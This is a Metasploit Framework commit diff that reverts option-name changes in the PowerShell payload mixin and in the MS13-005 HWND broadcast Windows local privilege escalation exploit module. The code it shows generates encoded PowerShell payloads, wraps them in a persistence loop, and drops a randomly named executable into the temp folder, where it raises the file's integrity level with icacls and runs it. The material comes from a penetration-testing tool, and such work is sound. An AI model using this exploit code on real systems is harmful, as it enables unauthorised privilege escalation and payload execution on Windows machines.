Revert datastore changes

Author: Meatballs1

lib/msf/core/exploit/powershell.rb

@@ -8,9 +8,9 @@ def initialize(info = {})
 		super
 		register_options(
 		[
-				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
-				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
-				OptBool.new('PSH::RUN_WOW64', [
+				OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
+				OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
+				OptBool.new('RUN_WOW64', [
 					true,
 					'Execute powershell in 32bit compatibility mode, payloads need native arch',
 					false
@@ -131,15 +131,15 @@ def run_hidden_psh(ps_code,ps_bin='powershell.exe')
 	#
 	# Creates cmd script to execute psh payload
 	#
-	def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
+	def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
 		# Allow powershell 1.0 format
 		if old_psh
 			psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
 		else
 			psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
 		end
 		# Run our payload in a while loop
-		if datastore['PSH::PERSIST']
+		if datastore['PERSIST']
 			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
 			sleep_time = rand(5)+5
 			psh_payload  = "function #{fun_name}{#{psh_payload}};"

modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb

@@ -12,11 +12,10 @@
 class Metasploit3 < Msf::Exploit::Local
 	Rank = ExcellentRanking
 
-	include Msf::Exploit::Powershell
 	include Msf::Exploit::EXE
 	include Msf::Exploit::Remote::HttpServer
-	include Msf::Exploit::FileDropper
 	include Msf::Post::File
+	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
 		super( update_info( info,
@@ -32,11 +31,7 @@ def initialize(info={})
 				affects versions  Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, RT.
 				But Spawning a command prompt with the shortcut key does not work in Vista so you will
 				have to check if the user is already running a command prompt and set SPAWN_PROMPT
-				false. The WEB technique will use powershell to download and execute a powershell
-				encoded payload. The FILE technique will drop an executable to the file system, set it
-				to medium integrity and execute it. The TYPE technique will attempt to execute a
-				powershell encoded payload directly from the command line but it may take some time to
-				complete.
+				false.
 			},
 			'License'	=> MSF_LICENSE,
 			'Author'	=>
@@ -66,14 +61,14 @@ def initialize(info={})
 		register_options(
 			[
 				OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
-				OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
-				OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
-				
+				OptBool.new('FILESYSTEM', [true, 'Drop payload to filesystem and execute', false])
 			], self.class
 		)
 
 	end
 
+	# Refactor this into Post lib with adobe_sandbox_adobecollabsync.rb
+	# Or use GetToken railgun calls?
 	def low_integrity_level?
 		tmp_dir = expand_path("%USERPROFILE%")
 		cd(tmp_dir)
@@ -120,7 +115,6 @@ def cleanup
 			vprint_status("Rehiding window...")
 			client.railgun.user32.ShowWindow(@hwin, 0)
 		end
-		super
 	end
 
 	def exploit
@@ -133,11 +127,10 @@ def exploit
 		# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
 		# integrity process can write.
 		drop_to_fs = false
-		if datastore['TECHNIQUE'] == 'FILE'
+		if datastore["FILESYSTEM"]
 			payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
 			begin
 				tmp_dir = expand_path("%TEMP%")
-				tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
 				cd(tmp_dir)
 				print_status("Trying to drop payload to #{tmp_dir}...")
 				if write_file(payload_file, generate_payload_exe)
@@ -158,16 +151,10 @@ def exploit
 		if drop_to_fs
 			command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
 			make_it(command)
-		elsif datastore['TECHNIQUE'] == 'TYPE'
-			if datastore['CUSTOM_COMMAND']
-				command = datastore['CUSTOM_COMMAND']
-			else
-				command = cmd_psh_payload(payload.encoded)
-			end
-			make_it(command)
 		else
 			super
 		end
+
 	end
 
 	def primer